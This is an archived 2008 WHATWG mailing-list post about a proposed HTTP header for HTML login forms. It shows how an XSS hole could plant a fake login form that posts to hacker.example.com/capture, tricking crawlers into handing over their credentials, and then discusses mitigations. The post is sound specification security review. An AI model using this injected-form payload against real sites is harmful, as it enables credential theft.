[whatwg] Solving the login/logout problem in HTML from Philip Taylor on 2008-11-26 (public-whatwg-archive@w3.org from November 2008)

From: Philip Taylor <excors+whatwg@gmail.com>
Date: Wed, 26 Nov 2008 16:57:48 +0000
Message-ID: <ea09c0d10811260857u7282c269ic641313dd1ec4d41@mail.gmail.com>
On Wed, Nov 26, 2008 at 10:12 AM, Ian Hickson <ian at hixie.ch> wrote:
> On Wed, 26 Nov 2008, Julian Reschke wrote:
>> Ian Hickson wrote:
>> > ...
>> > As can be seen in the feedback below, there is interest in improving the So
>> > when you get to a page that expects you to be logged in, it return a 401
>> > with:
>> >
>> >    WWW-Authenticate: HTML form="login"
>> >
>> > ...and there must be a <form> element with name="login", which represents
>> > the form that must be submitted to log in.
>> > ...
>>
>> For security reasons, I'd prefer that to be "the <form> element",
>> instead of "a <form> element" -- having multiple copies of the name in
>> the same document should be considered a fatal error.
>
> Having multiple <form> elements with the same name is already an error.
>
> I'm not sure what you mean by "fatal" error. The spec precisely defines
> which form should be used in the case of multiple forms with the same
> name. Could you describe the attack scenario you are considering?

If I'm not misunderstanding things, there is a new attack scenario:

I post a comment on someone's blog, saying <a
href="/restricted-access.php?xsshole=<form
action=http://hacker.example.com/capture name=login><input
name=username><input name=password></form>">crawl me!</a>

On their blog's web server, restricted-access.php require
authentication, and unauthenticated access results in a 401 with
'WWW-Authenticate: HTML form="login"' and the appropriate login form.
But inevitably there's some kind of XSS hole in that page, so
arbitrary markup can be inserted above the real login form. (Maybe
they pass an error message in a parameter, which will be displayed
above the form, but they forgot to escape the output.)

Their internal search engine crawler is configured to know a username
and password (and the form field names etc) for these restricted
areas. It follows the link from my blog comment, it notices the
WWW-Authenticate header, and like a good little bot it chooses to
parse the HTML page and find the matching form and fill in the fields
and submit the login details. But actually it's submitting my
XSS-inserted form, and sending the login details to me.

XSS holes already cause various security vulnerabilities; but they
can't currently result in sensibly-written crawlers unwittingly
submitting their login details to arbitrary third parties, so this is
a new risk.

I can imagine a few ways to avoid this problem:

 1) Don't write any pages with XSS holes.
 2) Detect tampering by refusing to submit login details if >= 2 forms
match the name.
 3) Only submit login details to same-origin URLs, or to some other
restricted set.
 4) Configure the crawler with the form submission URL, as well as the
form field names and values, so it doesn't have to trust the HTML.
 5) Change WWW-Authenticate so it gives all the details (submission
URL, field names, etc), so nobody has to trust the HTML.

But (1) is not going to happen in reality, so we should try to
minimise the damage when XSS holes exist. (2) won't work because the
attacker could write '...?xsshole=...<!--' and the second form would
be hidden. (3) is more sensible; perhaps the spec should explicitly
note that you need to be quite careful about not submitting login
forms to third-party sites unless you're sure you trust them?

But even with (3), I could write <a
href="/restricted-access.php?xsshole=<form
action=/public-pastebin.php>..."> and the crawler would send the login
details to somewhere on the same host where I could still read them
back, which doesn't seem great.

So (4) is more sensible. You already have to configure the crawler
with the form field names, so you might as well tell it what URL to
submit to, and it shouldn't parse the HTML response or care about the
<form> element. (Then there's no need for WWW-Authenticate to even say
what the form name is.)

(5) is basically the same, except it's late-binding the form details
rather than hardcoding them into the crawler's configuration, and so
it makes it easy to change the server-side login handling without
reconfiguring everyone's crawlers.

(But the cost of the potential solutions to the vulnerability might be
greater than the cost of the vulnerability, so it might not be worth
doing anything - I don't have a useful opinion on that.)

-- 
Philip Taylor
excors at gmail.com
Received on Wednesday, 26 November 2008 08:57:48 UTC